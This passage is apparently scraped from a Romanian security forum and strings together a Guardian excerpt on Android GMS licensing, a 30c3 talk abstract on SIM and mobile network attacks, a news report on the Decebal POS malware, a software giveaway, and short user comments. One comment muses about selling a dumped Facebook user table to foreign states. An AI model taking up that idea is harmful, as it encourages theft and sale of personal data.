Guardian. Google didn’t respond to a request for information about GMS pricing, and there is no publicly available list online. Haphazard and time-consuming But the process of getting GMS licences appears to be haphazard and time-consuming. “Installing Google Play without a GMS licence is illegal,” the source said. But, they explained, Google “don’t have the internal manpower to police it properly. It’s a volume game. Big OEMs [device manufacturers] pay. Smaller OEMs don’t register in Google’s radar, and they [Google] tend to turn a blind eye. Retailers get pressured by legal OEMs to make sure illegal installs of GMS are weeded out. It’s almost like crowdsourcing.” That “crowdsourcing” seems to have been KMS Components’ downfall. Argos complained to the Welsh company that the MyTablet which it had provided did not have a GMS licence. This was after Argos had publicly promoted the tablet as excitement about a “tablet Christmas” ramped up following Tesco’s announcement in September that it would sell its Hudl 7in tablet. Although Google could take out injunctions to prevent retailers selling unlicensed tablets that include GMS, there’s no record of it ever having done so. However in August 2010 Augen Electronics, the maker of a $150 tablet being sold through the giant American retail chain Kmart, abruptly withdrew it from sale there because it included “unauthorised versions” of the GMS suite. Compatibility club Separately, trial documents released from a dispute between Google and Skyhook, a provider of location services, in 2011 revealed internal emails in which Dan Morrill of Google told another staffer that it’s “obvious to the OEMs that we are using [GMS] compatibility as a club to make them do what we want.” Motorola, then an independent company, told Skyhook that Android devices are “approved essentially at Google’s discretion”. Skyhook had wanted Android device makers to use its location service rather than Google’s. Android compatibility testing is a key precursor step to being awarded a GMS licence. But such testing, and subsequently getting a licence from Google, can be a test in its own right, sources say. One described having to take the matter up with a senior Google vice-president to get the GMS licensing approved. “Smaller OEMs lose out, as they have a hard time getting the GMS licence, and therefore have little alternative but to go without it,” the source said. Yet it is possible to bypass that. End-users can legally install the GMS suite of apps if they know how to. The idea that Android is “open source” is partially true: the source code for the software is available online, via Google’s servers, and anyone can download it and make changes - as Amazon, for example, has done to create its own version for its Kindle line of tablets. But unlike the vast majority of widely used open-source projects such as Linux, MySQL, PHP or Python, which welcome outside contributors, only people working inside Google can make changes that will become part of the future direction of the software. Device manufacturers who want to get the upcoming version of Android have to wait for it to become available from Google’s servers. Sursa: Why Google Android software is not as free or open-source as you may think | Technology | theguardian.com

https://www.youtube.com/watch?v=ITR88wT8ekM&desktop_uri=%2Fwatch%3Fv%3DITR 88wT8ekM&app=desktop

Dupa astia cu SQL-I, asta e noua generatie de "hackeri". Se alege praful de lumea asta.

Sa ai acces la datele unei firme care valoreaza in jur de 100 de miliarde de dolari? Depinde cat si unde ai avea acces. Daca ai face un dump la tabelul facebook_users, valoarea sa ar trece usor de 10 milioane de $. Daca l-ai vinde Chinei sau Rusiei probabil ti-ai lua o insula exotica si cateva mii de virgine. Bine, nu doar utilizatorii, mai sunt si mesaje private, poze/videoclipuri private si multe alte lucruri utile: liste de prieteni, event-uri, locatii vizitate, adrese IP si cine mai stie ce date o pastra Facebook.

Facebook plateste bine, dar ganditi-va ce/cat ati putea face cu un SQL Injection sau Remote Code/Command Execution...

Asta e ca o vorba din popor: "Dupa ce te caci in mijlocul strazii, il mai iei si la palme".

Partea ciudata e urmatoarea: Adevarul spuneau in articolul lor ca in trecut acest tip a lucrat ca taximetrist.

"Cel mai cautat hacker din lume"

Cinci produse oferite gratuit de Ashampoo – Promotie limitata By Radu FaraVirusi(com) on January 20, 2014 Ashampoo ofera 5 produse de calitate cu licenta absolut gratuita. Este vorba despre Ashampoo WinOptimizer 2013, Ashampoo Burning Studio 2013 si Ashampoo Photo Commander 10, Ashampoo Snap 6, Ashampoo SlideshowStudio 2013. Bucurati-va de un sistem optimizat, crearea de discuri in orice tip de format si sistematizarea si aranjarea pozelor favorite folosind programele oferite mai sus. Folositi link-ul de mai jos pentru a beneficia de promotie: Your personal Ashampoo® gift Sursa: Cinci produse oferite gratuit de Ashampoo – Promotie limitata

Asa mai merge.

Stiu, nu e fun, dar e util.

30c3 - Mobile Network Attack Evolution Description: Mobile network attack evolution Mobile networks should protect users on several fronts: Calls need to be encrypted, customer data protected, and SIM cards shielded from malware. Many networks are still reluctant to implement appropriate protection measures in legacy systems. But even those who add mitigations often fail to fully capture attacks: They target symptoms instead of solving the core issue. This talks discusses mobile network and SIM card attacks that circumvent common protection techniques to illustrate the ongoing mobile attack evolution. The evolution is exemplified by new advanced attack vectors against mobile communication and SIM cards: Mobile calls and identities are known to be weakly protected, but network progressively rolled out patches to defeat hacking tools. We will discuss â and release â tools to measure whether these changes are effective. SIM cards were identified as a remote exploitation risk this year: Unnoticed by the victim, an attacker can take control over a card by sending a few binary SMS. Network operators started filtering binary SMS and patched some of their weak SIM card configurations in response to vulnerability research. The talk looks at filtering evasion techniques and discloses new configuration vulnerabilities present in many cards world-wide. For More Information please visit : - https://events.ccc.de/congress/2013/wiki/Main_Page Sursa: 30c3 - Mobile Network Attack Evolution

[h=1]Romanian Cybercriminals Launch “Decebal” POS Malware Written in VBScript[/h] January 18th, 2014, 09:53 GMT · By Eduard Kovacs esearchers from IT security firm IntelCrawler have identified a new malware, dubbed “Decebal,” that’s designed to steal information from point-of-sale (POS) systems. The threat has been written in VBScript and the functional code is less than 400 lines. Malware designed to target POS systems is becoming more and more popular, and the recent attacks aimed against Target, Neiman Marcus, and other US retailers demonstrate it. However, the Decebal malware – whose name stems from Decebalus, the king of Dacia, the historic region that today corresponds to Romania and Moldova – shows that such threats are constantly evolving. What’s interesting about Decebal is that it’s capable of checking to see if the computer on which it’s deployed is running any sandboxing or reverse engineering software. It’s also designed to validate payment card numbers. “There was also found Track 2 validation software, used by bad actors to check received compromised data by issuing bank by the first 6 digits (BIN), which has some phrases and text strings in Romanian, pointing on the original roots of possible authors,” IntelCrawler noted in its report. For instance, when an error occurs in the Track2 data validation process, the message “Esti beat?” is displayed in a pop-up. In Romanian, “Esti beat?” means “Are you drunk?” The strings “Select file” and “Validate” are also written in Romanian. The Decebal POS malware was first released on January 3, 2014. The threat has a very compact command and control server that acts as a gate for receiving data stolen from POS machines. “The code is pretty portable, scripting language is great advantage for easy infection to Point-of-Sale and is more flexible then binaries. This example shows that modern retailers environments can face with such threat and bad actors don't need to do lots of efforts for it,” explained Andrew Komarov, CEO of IntelCrawler. 14 hours ago, none of the antivirus engines from VirusTotal detected the threat. The sample was first checked on VirusTotal on January 12, but nothing has changed since then. Sursa: Romanian Cybercriminals Launch “Decebal” POS Malware Written in VBScript

De pe al cui cont Paypal oferi? Sugestie: nu faceti inca schimbul cu el, astept sa imi raspunda la intrebare.